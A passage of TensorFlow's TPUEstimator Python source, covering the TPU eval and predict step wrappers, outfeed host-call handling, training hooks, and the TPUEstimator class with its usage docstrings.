host_call_outfeed_ops = host_call.create_enqueue_op()
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return train_step, host_call, captured_scaffold_fn
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, a eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
representing the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, TPUEstimatorSpec):
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
to_record = {}
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, and captured scaffold_fn. The
predict_fn representing the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, TPUEstimatorSpec):
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
to_record = {}
identity_fn = lambda **kwargs: kwargs
# TODO(xiejw): Adds validation for prediction dictionrary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(tpu_estimator_spec.predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return predict_step, host_calls, captured_scaffold_fn
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
model_fn_args = util.fn_args(self._model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
params[_BATCH_SIZE_KEY] = batch_size_for_model_fn
estimator_spec = self._model_fn(features=features, **kwargs)
if (self._ctx.is_running_on_cpu(is_export_mode) and
isinstance(estimator_spec, TPUEstimatorSpec)):
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, TPUEstimatorSpec):
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(err_msg.format('training_chief_hooks'))
if estimator_spec.training_hooks:
raise ValueError(err_msg.format('training_hooks'))
if estimator_spec.evaluation_hooks:
raise ValueError(err_msg.format('evaluation_hooks'))
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = util.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise e
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
with ops.device(tpu.core(0)):
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated function is passed to the host_fn and
executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return []
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constraint it such that we have at most one outfeed dequeue and enqueue
# per replica.
tpu_device_placement_fn = self._ctx.tpu_device_placement_function
for i in xrange(self._ctx.num_replicas):
with ops.device(tpu_device_placement_fn(i)):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes, shapes=tensor_shapes)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos+len(self._tensors[name])]
pos += len(self._tensors[name])
# It is assumed evaluation always happens on single host TPU system. So,
# place all ops on tpu host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(core_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# TODO(xiejw): Allow users to specify the axis for batch size
# dimension.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = self._host_fns[name](**dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise e
else:
ret[name] = self._host_fns[name](*dequeue_ops)
return ret
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Count examples during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
examples_per_sec = self._batch_size * elapsed_steps / elapsed_time
if self._summary_writer is not None:
example_summary = Summary(value=[
Summary.Value(tag='examples_sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(example_summary, global_step)
logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker).
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.metrics.precision(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical system. In addition, due to some
usability issues, for prediction with small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shutdown the TPU system
properly for user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random_uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
Exporting `SavedModel` support on TPU is not yet implemented. So,
`export_savedmodel` is executed on CPU, even if `use_tpu` is true.
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator`. For training, the
returned `EstimatorSpec` cannot have hooks as it is not supported in
`TPUEstimator`.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be same. If
both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently,
- TPU training and evaluation respect this bit.
- Predict still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`.
Must be divisible by total number of replicas.
eval_batch_size: An int representing evaluation batch size.
Must be divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size.
Must be divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _TPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.computation_shape):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Passing non-None params as wrapped model_fn has it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params)
self._iterations_per_training_loop = (
self._config.tpu_config.iterations_per_loop)
# All properties passed to _TPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size,
eval_batch_size, predict_batch_size,
use_tpu)
self._is_input_fn_invoked = None
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
Either features or (features, labels) where features and labels are:
features - `Tensor` or dictionary of string feature name to `Tensor`.
labels - `Tensor` or dictionary of `Tensor` with labels.
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = util.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
# Setting the batch size in params first. This helps user to have same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
kwargs['params'][_BATCH_SIZE_KEY] = batch_size_for_input_fn
# For export_savedmodel, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn():
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has stronger check. Parent class's check generates confusing warning msg.
Args:
result: `features` returned by input_fn.
"""
pass
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
if mode != model_fn_lib.ModeKeys.PREDICT:
is_export_mode = False
else:
# For export_savedmodel, input_fn is never passed to Estimator. So, by
# checking the self._is_input_fn_invoked bit, we can know, given the
# mode == PREDICT, it is the .predict API, not export_savedmodel API.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
return model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
if mode == model_fn_lib.ModeKeys.TRAIN:
loss, host_call, scaffold = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
host_ops = host_call.create_tpu_hostcall()
if host_ops is None:
host_ops = []
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator)),
ExamplesPerSecondHook(ctx.global_batch_size,
output_dir=self.model_dir),
InstallSignalHandlerHook(),
training.LoggingTensorHook(
{
'loss': array_ops.identity(loss),
'step': training.get_global_step()
},
every_n_secs=30)
] + input_hooks
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops()
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_hooks=hooks,
train_op=control_flow_ops.group(*update_ops),
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
total_loss, host_calls, scaffold = _eval_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(total_loss,
math_ops.cast(
iterations_per_loop_var,
dtype=total_loss.dtype))
# Creates a dummy metric update_op for all metrics. Estimator expects
# all metrics in eval_metric_ops have update_op and calls them one by
# one. The real metric update_ops are invoked in a separated thread.
# So, here give Estimator the dummy op for all metrics.
with ops.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops()
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
for k, v in host_call_ret['eval_metrics'].items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator)),
] + input_hooks
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
dummy_predict_op, host_calls, scaffold = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops()
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yield the element (via generator) to call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoid the issue we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions, message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
host_ops = [] # Empty, we do do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(ctx, enqueue_ops,
host_ops),
] + input_hooks
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
single_tpu_eval_step, host_calls, captured_scaffold_fn = (
model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn))
def multi_tpu_eval_steps_on_single_shard():
return training_loop.repeat(
iterations_per_loop_var,
single_tpu_eval_step, [_ZERO_LOSS])
(loss,) = tpu.shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_calls, scaffold
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
single_tpu_train_step, host_call, captured_scaffold_fn = (
